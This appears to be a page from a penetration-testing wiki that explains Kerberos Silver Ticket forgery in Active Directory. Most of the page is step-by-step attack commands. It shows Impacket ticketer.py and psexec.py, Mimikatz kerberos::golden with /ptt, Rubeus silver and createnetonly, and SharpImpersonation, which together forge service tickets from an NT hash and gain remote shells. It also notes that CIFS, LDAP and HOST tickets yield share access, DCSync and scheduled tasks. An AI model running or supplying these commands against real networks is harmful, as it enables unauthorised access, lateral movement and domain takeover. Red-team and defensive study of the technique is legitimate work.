Silver Tickets

A Silver Ticket is a custom Service Ticket that allows any domain user to gain access to any service on a computer.

An attacker can create a Service Ticket using any arbitrary domain account, a target SPN, and a forged Privilege Attribute Certificate (PAC) that states that the arbitrary domain user has full access to the service.

The password for the target service computer account is required to create a Silver Ticket since the Privilege Attribute Certificate and Service Ticket are both encrypted using the service account's password.

Exploit

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.GitHub

Linux (Attacker)

## Create A Silver Ticket Using the NT Hash of the Target Account and Target SPN
ticketer.py -nthash [nt hash] -domain-sid [domain sid] -domain [domain] -spn cifs/computer.weelee.zip weelee

## Set Obtained .ccache to Kerberos Credential Cache
export KRB5CCNAME=[path to .ccache]

## Use Your Exec Tool of Choice to Access Your Specific Service
psexec.py [domain]/[username]@[computer] -k -no-pass

GitHub - gentilkiwi/mimikatz: A little tool to play with Windows securityGitHub

Windows (Target)

## Run Mimikatz.exe
Mimikatz.exe

## Create Silver Ticket And Inject The Ticket Into The Current Process
kerberos::golden /domain:weelee.zip /sid:[domain sid] /rc4:[nt hash] /service:cifs /target:computer.weelee.zip /user:weelee /ptt

## Use Your Exec Tool Of Choice To Access Your Specific Service
PSexec.exe -accepteula \\computer.weelee.zip cmd

The /rc4 flag can be replaced with /aes128 or /aes256 if the provided password is in a different encryption format.

GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.GitHub

GitHub - S3cur3Th1sSh1t/SharpImpersonation: A User Impersonation tool - via Token or Shellcode injectionGitHub

If you want to create a Silver Ticket with access to more than one service, you can add the /altservice: flag in your Rubeus command with any additional services.

Example/altservice:cifs,ldap,host,krbtgt,winrm

Windows (Target)

## Create A Silver Ticket And Inject It Into The Current Process
Rubeus.exe silver /service:cifs/computer.weelee.zip /rc4:[nt hash] /user:weelee /domain:weelee.zip /sid:[domain sid] /nowrap /ptt

## Use Your Exec Tool Of Choice To Access Your Specific Service
PSexec.exe -accepteula \\computer.weelee.zip cmd

OR

## Create A Silver Ticket
Rubeus.exe silver /service:cifs/dc.weelee.zip /rc4:[nt hash] /user:weelee /domain:weelee.zip /sid:[domain sid] /nowrap

## Create A New Process And Inject The Silver Ticket Into It (User/Pass Can Be Anything)
Rubeus.exe createnetonly /program:C:\Windows\System32.cmd.exe /domain:weelee.zip /username:weelee /password:anypassword /ticket:[previous command output]

## Use A Tool To Impersonate The Process Created Above
Invoke-SharpImpersonation -Command "pid:[pid]"

The /rc4 flag can be replaced with /aes128 or /aes256 if the provided password is in a different encryption format.

CIFS Allows you to access the C Drive and Admin Drive via SMB

LDAP Allows you to DCSync

HOST Allows you to create scheduled tasks on the computer

PreviousRoasting NextGolden Tickets

Last updated 1 year ago

hashtagExploit

Exploit